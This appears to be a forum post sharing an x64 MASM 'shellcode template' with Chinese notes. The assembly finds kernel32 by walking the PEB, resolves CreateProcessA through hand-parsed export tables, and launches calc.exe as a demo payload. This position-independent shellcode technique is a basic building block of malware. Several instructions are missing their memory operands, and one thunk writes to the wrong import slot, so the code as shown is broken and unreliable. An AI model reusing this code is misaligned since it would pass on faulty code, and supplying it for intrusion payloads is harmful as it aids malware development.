Masm64 shellcode template
编译工具 vs或者ddk携带的汇编编译器ml64 option casemap:none;--------------------------------------------------------------------------------
;set name=Shellcode
;ml /c /coff /Cp /Fl /Gd /nologo %name%.asm
;link /SUBSYSTEM:CONSOLE /DEBUG /DEBUGTYPE:CV %name%.obj /OUT:%name%.exe
;PAUSE
;--------------------------------------------------------------------------------
include shellcode.inc
include macro.asm
.code SHELL
jmp _main ;5
_thunk proc
jmp QWORD ptr ;2
_thunk endp
CreateProcessA proc
call @F ;5
_imp__CreateProcessA QWORD offset _thunk__CreateProcessA ;8
@@:
pop rax ;1
jmp _thunk ;2
CreateProcessA endp
CloseHandle proc
call @F
_imp__CloseHandle QWORD offset _thunk__CloseHandle
@@:
pop rax
jmp _thunk
CloseHandle endp
GetStartupInfo proc
call @F
_imp__GetStartupInfoA QWORD offset _thunk__GetStartupInfo
@@:
pop rax
jmp _thunk
GetStartupInfo endp
_KernelBase proc
mov rax,(_TEB ptr gs:).NtTib.Self
mov rax,(_TEB ptr ).ProcessEnvironmentBlock
mov rax,(_PEB ptr ).Ldr
mov rax,(_PEB_LDR_DATA ptr ).InInitializationOrderModuleList.Flink
mov rdx,(_LIST_ENTRY ptr ).Blink ;ntdll
mov rax,(_LIST_ENTRY ptr ).Flink
mov rcx,(_LIST_ENTRY ptr ).Blink;KERNELBASE
mov rax,(_LIST_ENTRY ptr ).Flink
mov rax,(_LIST_ENTRY ptr ).Blink;kenrl32
ret
_KernelBase endp
_StrLen proc uses rdi rcx
or rcx,-1
mov rdi,rax
xor rax,rax
repne scasb
not rcx
mov rax,rcx
ret
_StrLen endp
_StrCmp proc uses rcx rsi rdi
mov rax,rsi
call _StrLen
mov rcx,rax
mov rax,rdi
call _StrLen
cmp rax,rcx
jnz @F
repe cmpsb
mov rax,rcx
@@:
ret
ret
_StrCmp endp
_GetProcAddress proc uses rsi rdi rbx
mov rsi,rcx
mov ax,(IMAGE_DOS_HEADER ptr ).e_magic
cmp ax,"ZM"
jz @F
xor rax,rax
jmp done
@@:
mov ebx,(IMAGE_DOS_HEADER ptr ).e_lfanew
add rbx,rsi
mov eax,(IMAGE_NT_HEADERS ptr ).Signature
cmp eax,"EP"
jz @F
xor rax,rax
jmp done
@@:
lea rbx,(IMAGE_NT_HEADERS ptr ).OptionalHeader
mov ax,(_IMAGE_OPTIONAL_HEADER64 ptr ).Magic
cmp ax,20Bh
jz @F
;PE 32
xor rax,rax
jmp done
@@:
EXP EQU IMAGE_DIRECTORY_ENTRY_EXPORT*SizeOf _IMAGE_DATA_DIRECTORY
mov ebx,(_IMAGE_OPTIONAL_HEADER64 ptr ).DataDirectory
add rbx,rcx
mov r9d,(IMAGE_EXPORT_DIRECTORY ptr ).AddressOfNames
add r9,rcx
xor r8,r8
re:
mov eax,
add rax,rcx
mov si,
cmp si,
jnz @F
mov rsi,rax
mov rdi,rdx
call _StrCmp
or rax,rax
jnz @F
mov edi,(IMAGE_EXPORT_DIRECTORY ptr ).AddressOfFunctions
add rdi,rcx
mov eax,(IMAGE_EXPORT_DIRECTORY ptr ).AddressOfNameOrdinals
add rax,rcx
movzx eax,word ptr
mov eax,
add rax,rcx
jmp done
@@:
inc r8
cmp r8d,(IMAGE_EXPORT_DIRECTORY ptr ).NumberOfNames
jb re
xor rax,rax
done:
ret
_GetProcAddress endp
_thunk__CreateProcessA proc
push r9
push r8
push rdx
push rcx
call _KernelBase
mov rcx,rax
call @F
byte "CreateProcessA",0
@@:
pop rdx
call _GetProcAddress
mov _imp__CreateProcessA,rax
pop rcx
pop rdx
pop r8
pop r9
push rax
ret
_thunk__CreateProcessA endp
_thunk__CloseHandle proc
push r9
push r8
push rdx
push rcx
call _KernelBase
mov rcx,rax
call @F
byte "CloseHandle",0
@@:
pop rdx
call _GetProcAddress
mov _imp__CloseHandle,rax
pop rcx
pop rdx
pop r8
pop r9
push rax
ret
_thunk__CloseHandle endp
_thunk__GetStartupInfo proc
push r9
push r8
push rdx
push rcx
call _KernelBase
mov rcx,rax
call @F
byte "GetStartupInfoA",0
@@:
pop rdx
call _GetProcAddress
mov _imp__CloseHandle,rax
pop rcx
pop rdx
pop r8
pop r9
push rax
ret
_thunk__GetStartupInfo endp
_main proc uses rdi
@LOCAL _si,STARTUPINFO
@LOCAL _pi,PROCESS_INFORMATION
END_LOCAL QWORD * 10
and (STARTUPINFO ptr _si).cb,0
fastcall CreateProcessA,rcx,0,0,0,0,0,0,0,addr _si,addr _pi
or eax,eax
jz @F
fastcall CloseHandle,(PROCESS_INFORMATION ptr _pi).hThread
fastcall CloseHandle,(PROCESS_INFORMATION ptr _pi).hProcess
@@:
EPILOG
ret
_main endp
.code
WinMainCRTStartup proc
int 3
call @F
byte "calc.exe",0
@@:
pop rcx
int 3
call _main
int 3
ret
WinMainCRTStartup endp
end 有bug反馈,不定时间处理 支持Ayala!
页:
[1]